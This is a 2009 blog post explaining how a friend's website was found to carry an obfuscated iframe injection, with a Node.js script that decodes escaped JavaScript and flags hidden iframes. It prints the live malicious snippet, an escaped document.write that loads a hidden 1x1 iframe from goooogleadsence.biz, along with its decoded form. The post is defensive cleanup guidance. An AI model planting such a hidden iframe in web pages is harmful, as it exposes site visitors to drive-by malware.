Saturday, October 31, 2009

Obfuscated iFrame Injection Attacks

I have written several popular articles on iframe injections as you will find in this blog.

The people who implemented my suggestions, reported they had quite a bit of success in avoiding these malicious iframe injection attacks. Their websites were now safe and their traffic was continuous.

I had a friend who was a victim of these iframe injection attacks. When I tested his site, all tests indicated that his site was clean, and yet I knew this could not be the case. I checked all his index.* files and could not find any obvious hidden iframes. What I did notice was some obfuscated code that my friend could not explain.

Obfuscation is the concealment of meaning in communication, making communication confusing, intentionally ambiguous, and more difficult to interpret. It is basically a form of encryption. The web page is not really encrypted, or else the web page would not display when accessed. The web browser can tell the difference between this encrypted code and regular HTML, but the human eye cannot decipher the encrypted code.

Upon further investigation, I found that compromised websites can be infected with hidden iframes and/or with obfuscated (escaped) javascript code. My friend's website appeared to be a victim of this obfuscated iframe injection.

The following was the suspected malicious iframe injection obfuscated code:

[Script Language='Javascript']
[!--
document.write(unescape('%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D'));
//-->
[/Script]

Researching the issue further, I found websites that can deobfuscate, or decrypt, the code, at:

http://www.novirusthanks.org/services/javascript-unescape/

or at:

http://www.patzcatz.com/unescape.htm

What you do is copy only the obfuscated code, as shown below:

%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D

You then paste the code into the form box they provide and then click on "Deobfuscate".

The following was the resulting malicious iframe injection code:

[iframe src= http: //goooogleadsence.biz/_click=8F9DA width=1 height=1 style= visibility:hidden;position:absolute ][/iframe]
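The same decoding the online tools perform can be done offline, which also lets you scan a whole page at once. The following is an added example (not code from the original post): a small Node.js script that finds every document.write(unescape('...')) call in a page's source, decodes the escaped string the way a browser's legacy unescape() would, and reports iframes that are sized 1x1 or hidden by CSS. The sample page it scans is constructed here and embeds the obfuscated block shown above; because the post shows tag delimiters as square brackets, the scanner accepts both [ ] and < >.

```javascript
// Added example (not from the original post): decode document.write(unescape('...'))
// payloads as a browser would and flag iframes that look like hidden injections.
// Run with: node scan.js

// Decode %XX and %uXXXX sequences the way the legacy JavaScript unescape() does.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_, u, h) =>
    String.fromCharCode(parseInt(u !== undefined ? u : h, 16)));
}

// Collect every string literal passed as document.write(unescape('...')).
function extractEscapedPayloads(html) {
  const re = /document\.write\s*\(\s*unescape\s*\(\s*(['"])([^'"]*)\1\s*\)\s*\)/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[2]);
  return out;
}

// Return the reasons an iframe in decoded markup looks injected, or an empty
// array when there is no iframe or nothing suspicious about it.
// The post's sample shows tags as [iframe ...], so [ ] and < > are both accepted.
function iframeWarnings(decoded) {
  const tag = /[<\[]\s*iframe\b([^>\]]*)[>\]]/i.exec(decoded);
  if (!tag) return [];
  const attrs = tag[1];
  const reasons = [];
  if (/visibility\s*:\s*hidden|display\s*:\s*none/i.test(attrs)) reasons.push('hidden by CSS');
  if (/\bwidth\s*=\s*["']?[01]\b/i.test(attrs) && /\bheight\s*=\s*["']?[01]\b/i.test(attrs)) {
    reasons.push('1x1 or 0x0 frame');
  }
  if (/position\s*:\s*absolute/i.test(attrs)) reasons.push('absolutely positioned');
  // Tolerate the "http: //host" spacing seen in the decoded sample.
  const src = /\bsrc\s*=\s*["']?([^"'\s]+(?:\s*\/\/[^"'\s]+)?)/i.exec(attrs);
  if (src) reasons.push('src=' + src[1].replace(/\s+/g, ''));
  return reasons;
}

// Scan a page's source: decode every escaped payload and report the suspicious ones.
function scanHtml(html) {
  const findings = [];
  for (const payload of extractEscapedPayloads(html)) {
    const decoded = legacyUnescape(payload);
    const reasons = iframeWarnings(decoded);
    if (reasons.length > 0) findings.push({ decoded, reasons });
  }
  return findings;
}

// Constructed sample page: the post's obfuscated block (with the post's square
// brackets) plus a harmless escaped string that must not be flagged.
const SAMPLE_PAGE = `
<html><body>
<p>Welcome</p>
[Script Language='Javascript']
[!--
document.write(unescape('%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D'));
//-->
[/Script]
<script>document.write(unescape('%3Cp%3ESite%20footer%3C%2Fp%3E'));</script>
</body></html>`;

for (const f of scanHtml(SAMPLE_PAGE)) {
  console.log('SUSPICIOUS:', f.decoded);
  console.log('  reasons:', f.reasons.join('; '));
}
```

Run it against a saved copy of each index.* file rather than the live site, and review the decoded text yourself before deleting anything: the script only narrows down what to look at, and a legitimate widget can also use document.write with an escaped string, as the harmless footer in the sample shows.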

By completely removing the obfuscated (escaped) javascript code, my friend's website was clean and safe again.

If you implement my suggestions, particularly the CHMOD 444, after an iframe injection attack, and are fairly sure your website is clean, then chances are you may not be a victim of iframe injection obfuscated (escaped) javascript code. One must not forget, though, that no website will ever be 100% secure, which is why we must always practise preventative measures.

It is also important to remember that not all iframes are bad. Before you remove a suspected iframe, make sure it is not relevant to your web page. If you are not certain, download a copy of the web page before you delete anything, just to be safe.
